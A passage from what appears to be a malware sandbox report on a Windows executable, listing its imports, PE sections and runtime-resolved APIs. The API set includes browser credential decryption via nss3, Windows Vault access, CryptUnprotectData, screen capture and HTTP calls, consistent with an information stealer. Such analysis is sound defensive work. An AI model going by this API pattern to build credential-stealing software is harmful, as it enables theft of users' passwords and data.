2160. "address": "0x48f708"
2161. },
2162. {
2163. "name": "KillTimer",
2164. "address": "0x48f70c"
2165. },
2166. {
2167. "name": "CreatePopupMenu",
2168. "address": "0x48f710"
2169. },
2170. {
2171. "name": "RegisterWindowMessageW",
2172. "address": "0x48f714"
2173. },
2174. {
2175. "name": "SetTimer",
2176. "address": "0x48f718"
2177. },
2178. {
2179. "name": "ShowWindow",
2180. "address": "0x48f71c"
2181. },
2182. {
2183. "name": "CreateWindowExW",
2184. "address": "0x48f720"
2185. },
2186. {
2187. "name": "RegisterClassExW",
2188. "address": "0x48f724"
2189. },
2190. {
2191. "name": "LoadIconW",
2192. "address": "0x48f728"
2193. },
2194. {
2195. "name": "LoadCursorW",
2196. "address": "0x48f72c"
2197. },
2198. {
2199. "name": "GetSysColorBrush",
2200. "address": "0x48f730"
2201. },
2202. {
2203. "name": "GetForegroundWindow",
2204. "address": "0x48f734"
2205. },
2206. {
2207. "name": "MessageBoxA",
2208. "address": "0x48f738"
2209. },
2210. {
2211. "name": "DestroyIcon",
2212. "address": "0x48f73c"
2213. },
2214. {
2215. "name": "SystemParametersInfoW",
2216. "address": "0x48f740"
2217. },
2218. {
2219. "name": "LoadImageW",
2220. "address": "0x48f744"
2221. },
2222. {
2223. "name": "GetClassNameW",
2224. "address": "0x48f748"
2225. }
2226. ],
2227. "dll": "USER32.dll"
2228. },
2229. {
2230. "imports": [
2231. {
2232. "name": "StrokePath",
2233. "address": "0x48f0c4"
2234. },
2235. {
2236. "name": "DeleteObject",
2237. "address": "0x48f0c8"
2238. },
2239. {
2240. "name": "GetTextExtentPoint32W",
2241. "address": "0x48f0cc"
2242. },
2243. {
2244. "name": "ExtCreatePen",
2245. "address": "0x48f0d0"
2246. },
2247. {
2248. "name": "GetDeviceCaps",
2249. "address": "0x48f0d4"
2250. },
2251. {
2252. "name": "EndPath",
2253. "address": "0x48f0d8"
2254. },
2255. {
2256. "name": "SetPixel",
2257. "address": "0x48f0dc"
2258. },
2259. {
2260. "name": "CloseFigure",
2261. "address": "0x48f0e0"
2262. },
2263. {
2264. "name": "CreateCompatibleBitmap",
2265. "address": "0x48f0e4"
2266. },
2267. {
2268. "name": "CreateCompatibleDC",
2269. "address": "0x48f0e8"
2270. },
2271. {
2272. "name": "SelectObject",
2273. "address": "0x48f0ec"
2274. },
2275. {
2276. "name": "StretchBlt",
2277. "address": "0x48f0f0"
2278. },
2279. {
2280. "name": "GetDIBits",
2281. "address": "0x48f0f4"
2282. },
2283. {
2284. "name": "LineTo",
2285. "address": "0x48f0f8"
2286. },
2287. {
2288. "name": "AngleArc",
2289. "address": "0x48f0fc"
2290. },
2291. {
2292. "name": "MoveToEx",
2293. "address": "0x48f100"
2294. },
2295. {
2296. "name": "Ellipse",
2297. "address": "0x48f104"
2298. },
2299. {
2300. "name": "DeleteDC",
2301. "address": "0x48f108"
2302. },
2303. {
2304. "name": "GetPixel",
2305. "address": "0x48f10c"
2306. },
2307. {
2308. "name": "CreateDCW",
2309. "address": "0x48f110"
2310. },
2311. {
2312. "name": "GetStockObject",
2313. "address": "0x48f114"
2314. },
2315. {
2316. "name": "GetTextFaceW",
2317. "address": "0x48f118"
2318. },
2319. {
2320. "name": "CreateFontW",
2321. "address": "0x48f11c"
2322. },
2323. {
2324. "name": "SetTextColor",
2325. "address": "0x48f120"
2326. },
2327. {
2328. "name": "PolyDraw",
2329. "address": "0x48f124"
2330. },
2331. {
2332. "name": "BeginPath",
2333. "address": "0x48f128"
2334. },
2335. {
2336. "name": "Rectangle",
2337. "address": "0x48f12c"
2338. },
2339. {
2340. "name": "SetViewportOrgEx",
2341. "address": "0x48f130"
2342. },
2343. {
2344. "name": "GetObjectW",
2345. "address": "0x48f134"
2346. },
2347. {
2348. "name": "SetBkMode",
2349. "address": "0x48f138"
2350. },
2351. {
2352. "name": "RoundRect",
2353. "address": "0x48f13c"
2354. },
2355. {
2356. "name": "SetBkColor",
2357. "address": "0x48f140"
2358. },
2359. {
2360. "name": "CreatePen",
2361. "address": "0x48f144"
2362. },
2363. {
2364. "name": "CreateSolidBrush",
2365. "address": "0x48f148"
2366. },
2367. {
2368. "name": "StrokeAndFillPath",
2369. "address": "0x48f14c"
2370. }
2371. ],
2372. "dll": "GDI32.dll"
2373. },
2374. {
2375. "imports": [
2376. {
2377. "name": "GetOpenFileNameW",
2378. "address": "0x48f0b8"
2379. },
2380. {
2381. "name": "GetSaveFileNameW",
2382. "address": "0x48f0bc"
2383. }
2384. ],
2385. "dll": "COMDLG32.dll"
2386. },
2387. {
2388. "imports": [
2389. {
2390. "name": "GetAce",
2391. "address": "0x48f000"
2392. },
2393. {
2394. "name": "RegEnumValueW",
2395. "address": "0x48f004"
2396. },
2397. {
2398. "name": "RegDeleteValueW",
2399. "address": "0x48f008"
2400. },
2401. {
2402. "name": "RegDeleteKeyW",
2403. "address": "0x48f00c"
2404. },
2405. {
2406. "name": "RegEnumKeyExW",
2407. "address": "0x48f010"
2408. },
2409. {
2410. "name": "RegSetValueExW",
2411. "address": "0x48f014"
2412. },
2413. {
2414. "name": "RegOpenKeyExW",
2415. "address": "0x48f018"
2416. },
2417. {
2418. "name": "RegCloseKey",
2419. "address": "0x48f01c"
2420. },
2421. {
2422. "name": "RegQueryValueExW",
2423. "address": "0x48f020"
2424. },
2425. {
2426. "name": "RegConnectRegistryW",
2427. "address": "0x48f024"
2428. },
2429. {
2430. "name": "InitializeSecurityDescriptor",
2431. "address": "0x48f028"
2432. },
2433. {
2434. "name": "InitializeAcl",
2435. "address": "0x48f02c"
2436. },
2437. {
2438. "name": "AdjustTokenPrivileges",
2439. "address": "0x48f030"
2440. },
2441. {
2442. "name": "OpenThreadToken",
2443. "address": "0x48f034"
2444. },
2445. {
2446. "name": "OpenProcessToken",
2447. "address": "0x48f038"
2448. },
2449. {
2450. "name": "LookupPrivilegeValueW",
2451. "address": "0x48f03c"
2452. },
2453. {
2454. "name": "DuplicateTokenEx",
2455. "address": "0x48f040"
2456. },
2457. {
2458. "name": "CreateProcessAsUserW",
2459. "address": "0x48f044"
2460. },
2461. {
2462. "name": "CreateProcessWithLogonW",
2463. "address": "0x48f048"
2464. },
2465. {
2466. "name": "GetLengthSid",
2467. "address": "0x48f04c"
2468. },
2469. {
2470. "name": "CopySid",
2471. "address": "0x48f050"
2472. },
2473. {
2474. "name": "LogonUserW",
2475. "address": "0x48f054"
2476. },
2477. {
2478. "name": "AllocateAndInitializeSid",
2479. "address": "0x48f058"
2480. },
2481. {
2482. "name": "CheckTokenMembership",
2483. "address": "0x48f05c"
2484. },
2485. {
2486. "name": "RegCreateKeyExW",
2487. "address": "0x48f060"
2488. },
2489. {
2490. "name": "FreeSid",
2491. "address": "0x48f064"
2492. },
2493. {
2494. "name": "GetTokenInformation",
2495. "address": "0x48f068"
2496. },
2497. {
2498. "name": "GetSecurityDescriptorDacl",
2499. "address": "0x48f06c"
2500. },
2501. {
2502. "name": "GetAclInformation",
2503. "address": "0x48f070"
2504. },
2505. {
2506. "name": "AddAce",
2507. "address": "0x48f074"
2508. },
2509. {
2510. "name": "SetSecurityDescriptorDacl",
2511. "address": "0x48f078"
2512. },
2513. {
2514. "name": "GetUserNameW",
2515. "address": "0x48f07c"
2516. },
2517. {
2518. "name": "InitiateSystemShutdownExW",
2519. "address": "0x48f080"
2520. }
2521. ],
2522. "dll": "ADVAPI32.dll"
2523. },
2524. {
2525. "imports": [
2526. {
2527. "name": "DragQueryPoint",
2528. "address": "0x48f48c"
2529. },
2530. {
2531. "name": "ShellExecuteExW",
2532. "address": "0x48f490"
2533. },
2534. {
2535. "name": "DragQueryFileW",
2536. "address": "0x48f494"
2537. },
2538. {
2539. "name": "SHEmptyRecycleBinW",
2540. "address": "0x48f498"
2541. },
2542. {
2543. "name": "SHGetPathFromIDListW",
2544. "address": "0x48f49c"
2545. },
2546. {
2547. "name": "SHBrowseForFolderW",
2548. "address": "0x48f4a0"
2549. },
2550. {
2551. "name": "SHCreateShellItem",
2552. "address": "0x48f4a4"
2553. },
2554. {
2555. "name": "SHGetDesktopFolder",
2556. "address": "0x48f4a8"
2557. },
2558. {
2559. "name": "SHGetSpecialFolderLocation",
2560. "address": "0x48f4ac"
2561. },
2562. {
2563. "name": "SHGetFolderPathW",
2564. "address": "0x48f4b0"
2565. },
2566. {
2567. "name": "SHFileOperationW",
2568. "address": "0x48f4b4"
2569. },
2570. {
2571. "name": "ExtractIconExW",
2572. "address": "0x48f4b8"
2573. },
2574. {
2575. "name": "Shell_NotifyIconW",
2576. "address": "0x48f4bc"
2577. },
2578. {
2579. "name": "ShellExecuteW",
2580. "address": "0x48f4c0"
2581. },
2582. {
2583. "name": "DragFinish",
2584. "address": "0x48f4c4"
2585. }
2586. ],
2587. "dll": "SHELL32.dll"
2588. },
2589. {
2590. "imports": [
2591. {
2592. "name": "CoTaskMemAlloc",
2593. "address": "0x48f828"
2594. },
2595. {
2596. "name": "CoTaskMemFree",
2597. "address": "0x48f82c"
2598. },
2599. {
2600. "name": "CLSIDFromString",
2601. "address": "0x48f830"
2602. },
2603. {
2604. "name": "ProgIDFromCLSID",
2605. "address": "0x48f834"
2606. },
2607. {
2608. "name": "CLSIDFromProgID",
2609. "address": "0x48f838"
2610. },
2611. {
2612. "name": "OleSetMenuDescriptor",
2613. "address": "0x48f83c"
2614. },
2615. {
2616. "name": "MkParseDisplayName",
2617. "address": "0x48f840"
2618. },
2619. {
2620. "name": "OleSetContainedObject",
2621. "address": "0x48f844"
2622. },
2623. {
2624. "name": "CoCreateInstance",
2625. "address": "0x48f848"
2626. },
2627. {
2628. "name": "IIDFromString",
2629. "address": "0x48f84c"
2630. },
2631. {
2632. "name": "StringFromGUID2",
2633. "address": "0x48f850"
2634. },
2635. {
2636. "name": "CreateStreamOnHGlobal",
2637. "address": "0x48f854"
2638. },
2639. {
2640. "name": "OleInitialize",
2641. "address": "0x48f858"
2642. },
2643. {
2644. "name": "OleUninitialize",
2645. "address": "0x48f85c"
2646. },
2647. {
2648. "name": "CoInitialize",
2649. "address": "0x48f860"
2650. },
2651. {
2652. "name": "CoUninitialize",
2653. "address": "0x48f864"
2654. },
2655. {
2656. "name": "GetRunningObjectTable",
2657. "address": "0x48f868"
2658. },
2659. {
2660. "name": "CoGetInstanceFromFile",
2661. "address": "0x48f86c"
2662. },
2663. {
2664. "name": "CoGetObject",
2665. "address": "0x48f870"
2666. },
2667. {
2668. "name": "CoSetProxyBlanket",
2669. "address": "0x48f874"
2670. },
2671. {
2672. "name": "CoCreateInstanceEx",
2673. "address": "0x48f878"
2674. },
2675. {
2676. "name": "CoInitializeSecurity",
2677. "address": "0x48f87c"
2678. }
2679. ],
2680. "dll": "ole32.dll"
2681. },
2682. {
2683. "imports": [
2684. {
2685. "name": "LoadTypeLibEx",
2686. "address": "0x48f40c"
2687. },
2688. {
2689. "name": "VariantCopyInd",
2690. "address": "0x48f410"
2691. },
2692. {
2693. "name": "SysReAllocString",
2694. "address": "0x48f414"
2695. },
2696. {
2697. "name": "SysFreeString",
2698. "address": "0x48f418"
2699. },
2700. {
2701. "name": "SafeArrayDestroyDescriptor",
2702. "address": "0x48f41c"
2703. },
2704. {
2705. "name": "SafeArrayDestroyData",
2706. "address": "0x48f420"
2707. },
2708. {
2709. "name": "SafeArrayUnaccessData",
2710. "address": "0x48f424"
2711. },
2712. {
2713. "name": "SafeArrayAccessData",
2714. "address": "0x48f428"
2715. },
2716. {
2717. "name": "SafeArrayAllocData",
2718. "address": "0x48f42c"
2719. },
2720. {
2721. "name": "SafeArrayAllocDescriptorEx",
2722. "address": "0x48f430"
2723. },
2724. {
2725. "name": "SafeArrayCreateVector",
2726. "address": "0x48f434"
2727. },
2728. {
2729. "name": "RegisterTypeLib",
2730. "address": "0x48f438"
2731. },
2732. {
2733. "name": "CreateStdDispatch",
2734. "address": "0x48f43c"
2735. },
2736. {
2737. "name": "DispCallFunc",
2738. "address": "0x48f440"
2739. },
2740. {
2741. "name": "VariantChangeType",
2742. "address": "0x48f444"
2743. },
2744. {
2745. "name": "SysStringLen",
2746. "address": "0x48f448"
2747. },
2748. {
2749. "name": "VariantTimeToSystemTime",
2750. "address": "0x48f44c"
2751. },
2752. {
2753. "name": "VarR8FromDec",
2754. "address": "0x48f450"
2755. },
2756. {
2757. "name": "SafeArrayGetVartype",
2758. "address": "0x48f454"
2759. },
2760. {
2761. "name": "VariantCopy",
2762. "address": "0x48f458"
2763. },
2764. {
2765. "name": "VariantClear",
2766. "address": "0x48f45c"
2767. },
2768. {
2769. "name": "OleLoadPicture",
2770. "address": "0x48f460"
2771. },
2772. {
2773. "name": "QueryPathOfRegTypeLib",
2774. "address": "0x48f464"
2775. },
2776. {
2777. "name": "RegisterTypeLibForUser",
2778. "address": "0x48f468"
2779. },
2780. {
2781. "name": "UnRegisterTypeLibForUser",
2782. "address": "0x48f46c"
2783. },
2784. {
2785. "name": "UnRegisterTypeLib",
2786. "address": "0x48f470"
2787. },
2788. {
2789. "name": "CreateDispTypeInfo",
2790. "address": "0x48f474"
2791. },
2792. {
2793. "name": "SysAllocString",
2794. "address": "0x48f478"
2795. },
2796. {
2797. "name": "VariantInit",
2798. "address": "0x48f47c"
2799. }
2800. ],
2801. "dll": "OLEAUT32.dll"
2802. }
2803. ],
2804. "digital_signers": null,
2805. "exported_dll_name": null,
2806. "actual_checksum": "0x0018a386",
2807. "overlay": null,
2808. "imagebase": "0x00400000",
2809. "reported_checksum": "0x00171d9c",
2810. "icon_hash": null,
2811. "entrypoint": "0x0042800a",
2812. "timestamp": "2019-06-25 20:45:42",
2813. "osversion": "5.1",
2814. "sections": [
2815. {
2816. "name": ".text",
2817. "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
2818. "virtual_address": "0x00001000",
2819. "size_of_data": "0x0008e000",
2820. "entropy": "6.68",
2821. "raw_address": "0x00000400",
2822. "virtual_size": "0x0008dfdd",
2823. "characteristics_raw": "0x60000020"
2824. },
2825. {
2826. "name": ".rdata",
2827. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2828. "virtual_address": "0x0008f000",
2829. "size_of_data": "0x0002fe00",
2830. "entropy": "5.76",
2831. "raw_address": "0x0008e400",
2832. "virtual_size": "0x0002fd8e",
2833. "characteristics_raw": "0x40000040"
2834. },
2835. {
2836. "name": ".data",
2837. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
2838. "virtual_address": "0x000bf000",
2839. "size_of_data": "0x00005200",
2840. "entropy": "1.20",
2841. "raw_address": "0x000be200",
2842. "virtual_size": "0x00008f74",
2843. "characteristics_raw": "0xc0000040"
2844. },
2845. {
2846. "name": ".rsrc",
2847. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
2848. "virtual_address": "0x000c8000",
2849. "size_of_data": "0x000be000",
2850. "entropy": "7.96",
2851. "raw_address": "0x000c3400",
2852. "virtual_size": "0x000bdf40",
2853. "characteristics_raw": "0x40000040"
2854. },
2855. {
2856. "name": ".reloc",
2857. "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
2858. "virtual_address": "0x00186000",
2859. "size_of_data": "0x00007200",
2860. "entropy": "6.78",
2861. "raw_address": "0x00181400",
2862. "virtual_size": "0x00007134",
2863. "characteristics_raw": "0x42000040"
2864. }
2865. ],
2866. "resources": [],
2867. "dirents": [
2868. {
2869. "virtual_address": "0x00000000",
2870. "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
2871. "size": "0x00000000"
2872. },
2873. {
2874. "virtual_address": "0x000bc0cc",
2875. "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
2876. "size": "0x0000017c"
2877. },
2878. {
2879. "virtual_address": "0x000c8000",
2880. "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
2881. "size": "0x000bdf40"
2882. },
2883. {
2884. "virtual_address": "0x00000000",
2885. "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
2886. "size": "0x00000000"
2887. },
2888. {
2889. "virtual_address": "0x00000000",
2890. "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
2891. "size": "0x00000000"
2892. },
2893. {
2894. "virtual_address": "0x00186000",
2895. "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
2896. "size": "0x00007134"
2897. },
2898. {
2899. "virtual_address": "0x00092bc0",
2900. "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
2901. "size": "0x0000001c"
2902. },
2903. {
2904. "virtual_address": "0x00000000",
2905. "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
2906. "size": "0x00000000"
2907. },
2908. {
2909. "virtual_address": "0x00000000",
2910. "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
2911. "size": "0x00000000"
2912. },
2913. {
2914. "virtual_address": "0x00000000",
2915. "name": "IMAGE_DIRECTORY_ENTRY_TLS",
2916. "size": "0x00000000"
2917. },
2918. {
2919. "virtual_address": "0x000a4b50",
2920. "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
2921. "size": "0x00000040"
2922. },
2923. {
2924. "virtual_address": "0x00000000",
2925. "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
2926. "size": "0x00000000"
2927. },
2928. {
2929. "virtual_address": "0x0008f000",
2930. "name": "IMAGE_DIRECTORY_ENTRY_IAT",
2931. "size": "0x00000884"
2932. },
2933. {
2934. "virtual_address": "0x00000000",
2935. "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
2936. "size": "0x00000000"
2937. },
2938. {
2939. "virtual_address": "0x00000000",
2940. "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
2941. "size": "0x00000000"
2942. },
2943. {
2944. "virtual_address": "0x00000000",
2945. "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
2946. "size": "0x00000000"
2947. }
2948. ],
2949. "exports": [],
2950. "guest_signers": {},
2951. "imphash": "afcdf79be1557326c854b6e20cb900a7",
2952. "icon_fuzzy": null,
2953. "icon": null,
2954. "pdbpath": null,
2955. "imported_dll_count": 18,
2956. "versioninfo": []
2957. }
2958. }
2959.  
2960. [*] Resolved APIs: [
2961. "kernel32.dll.FlsAlloc",
2962. "kernel32.dll.FlsFree",
2963. "kernel32.dll.FlsGetValue",
2964. "kernel32.dll.FlsSetValue",
2965. "kernel32.dll.InitializeCriticalSectionEx",
2966. "kernel32.dll.CreateEventExW",
2967. "kernel32.dll.CreateSemaphoreExW",
2968. "kernel32.dll.SetThreadStackGuarantee",
2969. "kernel32.dll.CreateThreadpoolTimer",
2970. "kernel32.dll.SetThreadpoolTimer",
2971. "kernel32.dll.WaitForThreadpoolTimerCallbacks",
2972. "kernel32.dll.CloseThreadpoolTimer",
2973. "kernel32.dll.CreateThreadpoolWait",
2974. "kernel32.dll.SetThreadpoolWait",
2975. "kernel32.dll.CloseThreadpoolWait",
2976. "kernel32.dll.FlushProcessWriteBuffers",
2977. "kernel32.dll.FreeLibraryWhenCallbackReturns",
2978. "kernel32.dll.GetCurrentProcessorNumber",
2979. "kernel32.dll.GetLogicalProcessorInformation",
2980. "kernel32.dll.CreateSymbolicLinkW",
2981. "kernel32.dll.EnumSystemLocalesEx",
2982. "kernel32.dll.CompareStringEx",
2983. "kernel32.dll.GetDateFormatEx",
2984. "kernel32.dll.GetLocaleInfoEx",
2985. "kernel32.dll.GetTimeFormatEx",
2986. "kernel32.dll.GetUserDefaultLocaleName",
2987. "kernel32.dll.IsValidLocaleName",
2988. "kernel32.dll.LCMapStringEx",
2989. "kernel32.dll.GetTickCount64",
2990. "kernel32.dll.GetNativeSystemInfo",
2991. "cryptbase.dll.SystemFunction036",
2992. "uxtheme.dll.ThemeInitApiHook",
2993. "user32.dll.IsProcessDPIAware",
2994. "kernel32.dll.Wow64DisableWow64FsRedirection",
2995. "kernel32.dll.Wow64RevertWow64FsRedirection",
2996. "dwmapi.dll.DwmIsCompositionEnabled",
2997. "comctl32.dll.RegisterClassNameW",
2998. "kernel32.dll.SortGetHandle",
2999. "kernel32.dll.SortCloseHandle",
3000. "uxtheme.dll.OpenThemeData",
3001. "uxtheme.dll.GetThemeBool",
3002. "imm32.dll.ImmGetContext",
3003. "imm32.dll.ImmReleaseContext",
3004. "imm32.dll.ImmAssociateContext",
3005. "imm32.dll.ImmIsIME",
3006. "comctl32.dll.HIMAGELIST_QueryInterface",
3007. "comctl32.dll.DrawShadowText",
3008. "comctl32.dll.DrawSizeBox",
3009. "comctl32.dll.DrawScrollBar",
3010. "comctl32.dll.SizeBoxHwnd",
3011. "comctl32.dll.ScrollBar_MouseMove",
3012. "comctl32.dll.ScrollBar_Menu",
3013. "comctl32.dll.HandleScrollCmd",
3014. "comctl32.dll.DetachScrollBars",
3015. "comctl32.dll.AttachScrollBars",
3016. "comctl32.dll.CCSetScrollInfo",
3017. "comctl32.dll.CCGetScrollInfo",
3018. "comctl32.dll.CCEnableScrollBar",
3019. "comctl32.dll.QuerySystemGestureStatus",
3020. "uxtheme.dll.#49",
3021. "shell32.dll.#66",
3022. "ole32.dll.CoTaskMemFree",
3023. "kernel32.dll.GetVersionExW",
3024. "kernel32.dll.FindResourceW",
3025. "kernel32.dll.SizeofResource",
3026. "kernel32.dll.LoadResource",
3027. "kernel32.dll.LockResource",
3028. "advapi32.dll.CryptAcquireContextA",
3029. "cryptsp.dll.CryptAcquireContextA",
3030. "advapi32.dll.CryptCreateHash",
3031. "cryptsp.dll.CryptCreateHash",
3032. "advapi32.dll.CryptHashData",
3033. "cryptsp.dll.CryptHashData",
3034. "advapi32.dll.CryptDeriveKey",
3035. "cryptsp.dll.CryptDeriveKey",
3036. "advapi32.dll.CryptDestroyHash",
3037. "cryptsp.dll.CryptDestroyHash",
3038. "advapi32.dll.CryptDecrypt",
3039. "cryptsp.dll.CryptDecrypt",
3040. "advapi32.dll.CryptDestroyKey",
3041. "cryptsp.dll.CryptDestroyKey",
3042. "advapi32.dll.CryptReleaseContext",
3043. "cryptsp.dll.CryptReleaseContext",
3044. "kernel32.dll.VirtualAlloc",
3045. "advapi32.dll.CryptAcquireContextW",
3046. "user32.dll.MessageBoxA",
3047. "ole32.dll.CoInitializeEx",
3048. "ole32.dll.CoCreateInstance",
3049. "kernel32.dll.CreateMutexW",
3050. "apphelp.dll.ApphelpCheckRunAppEx",
3051. "apphelp.dll.ApphelpQueryModuleDataEx",
3052. "apphelp.dll.ApphelpParseModuleData",
3053. "apphelp.dll.ApphelpCreateAppcompatData",
3054. "apphelp.dll.SdbInitDatabaseEx",
3055. "apphelp.dll.SdbReleaseDatabase",
3056. "apphelp.dll.SdbUnpackAppCompatData",
3057. "apphelp.dll.SdbQueryContext",
3058. "kernel32.dll.VirtualFree",
3059. "kernel32.dll.GetProcessId",
3060. "uxtheme.dll.CloseThemeData",
3061. "oleaut32.dll.#500",
3062. "crypt32.dll.CryptUnprotectData",
3063. "crtdll.dll.wcscmp",
3064. "gdiplus.dll.GdiplusStartup",
3065. "gdiplus.dll.GdiplusShutdown",
3066. "gdiplus.dll.GdipCreateBitmapFromHBITMAP",
3067. "gdiplus.dll.GdipGetImageEncodersSize",
3068. "gdiplus.dll.GdipGetImageEncoders",
3069. "gdiplus.dll.GdipDisposeImage",
3070. "gdiplus.dll.GdipSaveImageToStream",
3071. "ole32.dll.CreateStreamOnHGlobal",
3072. "ole32.dll.GetHGlobalFromStream",
3073. "kernel32.dll.ExpandEnvironmentStringsW",
3074. "kernel32.dll.GetComputerNameW",
3075. "kernel32.dll.GlobalMemoryStatus",
3076. "kernel32.dll.CreateFileW",
3077. "kernel32.dll.GetFileSize",
3078. "kernel32.dll.CloseHandle",
3079. "kernel32.dll.ReadFile",
3080. "kernel32.dll.GetFileAttributesW",
3081. "kernel32.dll.CreateMutexA",
3082. "kernel32.dll.ReleaseMutex",
3083. "kernel32.dll.GetLastError",
3084. "kernel32.dll.GetCurrentDirectoryW",
3085. "kernel32.dll.SetEnvironmentVariableW",
3086. "kernel32.dll.SetCurrentDirectoryW",
3087. "kernel32.dll.FindFirstFileW",
3088. "kernel32.dll.FindNextFileW",
3089. "kernel32.dll.LocalFree",
3090. "kernel32.dll.GetTickCount",
3091. "kernel32.dll.CopyFileW",
3092. "kernel32.dll.FindClose",
3093. "kernel32.dll.GlobalMemoryStatusEx",
3094. "kernel32.dll.CreateToolhelp32Snapshot",
3095. "kernel32.dll.Process32FirstW",
3096. "kernel32.dll.Process32NextW",
3097. "kernel32.dll.GetModuleFileNameW",
3098. "kernel32.dll.SetDllDirectoryW",
3099. "kernel32.dll.GetLocaleInfoA",
3100. "kernel32.dll.GetLocalTime",
3101. "kernel32.dll.GetTimeZoneInformation",
3102. "kernel32.dll.RemoveDirectoryW",
3103. "kernel32.dll.DeleteFileW",
3104. "kernel32.dll.GetLogicalDriveStringsA",
3105. "kernel32.dll.GetDriveTypeA",
3106. "kernel32.dll.CreateProcessW",
3107. "advapi32.dll.GetUserNameW",
3108. "advapi32.dll.RegCreateKeyExW",
3109. "advapi32.dll.RegQueryValueExW",
3110. "advapi32.dll.RegCloseKey",
3111. "advapi32.dll.RegOpenKeyExW",
3112. "advapi32.dll.AllocateAndInitializeSid",
3113. "advapi32.dll.LookupAccountSidA",
3114. "advapi32.dll.CreateProcessAsUserW",
3115. "advapi32.dll.CheckTokenMembership",
3116. "advapi32.dll.RegOpenKeyW",
3117. "advapi32.dll.RegEnumKeyW",
3118. "advapi32.dll.RegEnumValueW",
3119. "advapi32.dll.CryptGetHashParam",
3120. "user32.dll.EnumDisplayDevicesW",
3121. "user32.dll.wvsprintfA",
3122. "user32.dll.GetKeyboardLayoutList",
3123. "shell32.dll.ShellExecuteExW",
3124. "ntdll.dll.RtlComputeCrc32",
3125. "sechost.dll.LookupAccountSidLocalA",
3126. "wininet.dll.InternetOpenA",
3127. "wininet.dll.InternetConnectA",
3128. "wininet.dll.HttpOpenRequestA",
3129. "wininet.dll.HttpAddRequestHeadersA",
3130. "wininet.dll.HttpSendRequestA",
3131. "wininet.dll.InternetReadFile",
3132. "wininet.dll.InternetCloseHandle",
3133. "wininet.dll.InternetCrackUrlA",
3134. "wininet.dll.InternetSetOptionA",
3135. "rasapi32.dll.RasConnectionNotificationW",
3136. "sechost.dll.NotifyServiceStatusChangeA",
3137. "nss3.dll.sqlite3_open",
3138. "nss3.dll.sqlite3_close",
3139. "nss3.dll.sqlite3_prepare_v2",
3140. "nss3.dll.sqlite3_step",
3141. "nss3.dll.sqlite3_column_text",
3142. "nss3.dll.sqlite3_column_bytes",
3143. "nss3.dll.sqlite3_finalize",
3144. "nss3.dll.NSS_Init",
3145. "nss3.dll.PK11_GetInternalKeySlot",
3146. "nss3.dll.PK11_Authenticate",
3147. "nss3.dll.PK11SDR_Decrypt",
3148. "nss3.dll.NSS_Shutdown",
3149. "nss3.dll.PK11_FreeSlot",
3150. "ole32.dll.CLSIDFromString",
3151. "vaultcli.dll.VaultOpenVault",
3152. "vaultcli.dll.VaultEnumerateItems",
3153. "vaultcli.dll.VaultGetItem",
3154. "mlang.dll.#112",
3155. "wininet.dll.FindFirstUrlCacheEntryA",
3156. "urlmon.dll.CreateUri",
3157. "wininet.dll.FindNextUrlCacheEntryA",
3158. "urlmon.dll.CreateIUriBuilder",
3159. "urlmon.dll.IntlPercentEncodeNormalize",
3160. "wininet.dll.FindCloseUrlCache",
3161. "kernel32.dll.IsWow64Process",
3162. "user32.dll.EnumDisplayDevicesA",
3163. "rpcrt4.dll.RpcBindingFree",
3164. "sechost.dll.LookupAccountNameLocalW",
3165. "advapi32.dll.LookupAccountSidW",
3166. "sechost.dll.LookupAccountSidLocalW",
3167. "ole32.dll.CoInitializeSecurity",
3168. "w32time.dll.SvchostEntry_W32Time",
3169. "w32time.dll.SvchostPushServiceGlobals",
3170. "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
3171. "ws2_32.dll.#115",
3172. "ws2_32.dll.WSASocketW",
3173. "ws2_32.dll.WSAIoctl",
3174. "ws2_32.dll.#111",
3175. "userenv.dll.RegisterGPNotification",
3176. "gpapi.dll.RegisterGPNotificationInternal",
3177. "sechost.dll.OpenSCManagerW",
3178. "sechost.dll.OpenServiceW",
3179. "sechost.dll.CloseServiceHandle",
3180. "sechost.dll.QueryServiceConfigW",
3181. "dsrole.dll.DsRoleGetPrimaryDomainInformation",
3182. "dsrole.dll.DsRoleFreeMemory",
3183. "sspicli.dll.LsaRegisterPolicyChangeNotification",
3184. "w32time.dll.TimeProvClose",
3185. "w32time.dll.TimeProvCommand",
3186. "w32time.dll.TimeProvOpen",
3187. "ws2_32.dll.getaddrinfo",
3188. "ws2_32.dll.freeaddrinfo",
3189. "ws2_32.dll.#23",
3190. "ws2_32.dll.#21",
3191. "ws2_32.dll.#2",
3192. "ws2_32.dll.WSAEventSelect",
3193. "vmictimeprovider.dll.TimeProvClose",
3194. "vmictimeprovider.dll.TimeProvCommand",
3195. "vmictimeprovider.dll.TimeProvOpen",
3196. "advapi32.dll.EventRegister",
3197. "advapi32.dll.EventEnabled",
3198. "advapi32.dll.EventWrite",
3199. "ws2_32.dll.GetAddrInfoW",
3200. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
3201. "ws2_32.dll.FreeAddrInfoW",
3202. "ws2_32.dll.WSAAddressToStringW",
3203. "ws2_32.dll.#3",
3204. "ws2_32.dll.#116",
3205. "advapi32.dll.EventUnregister",
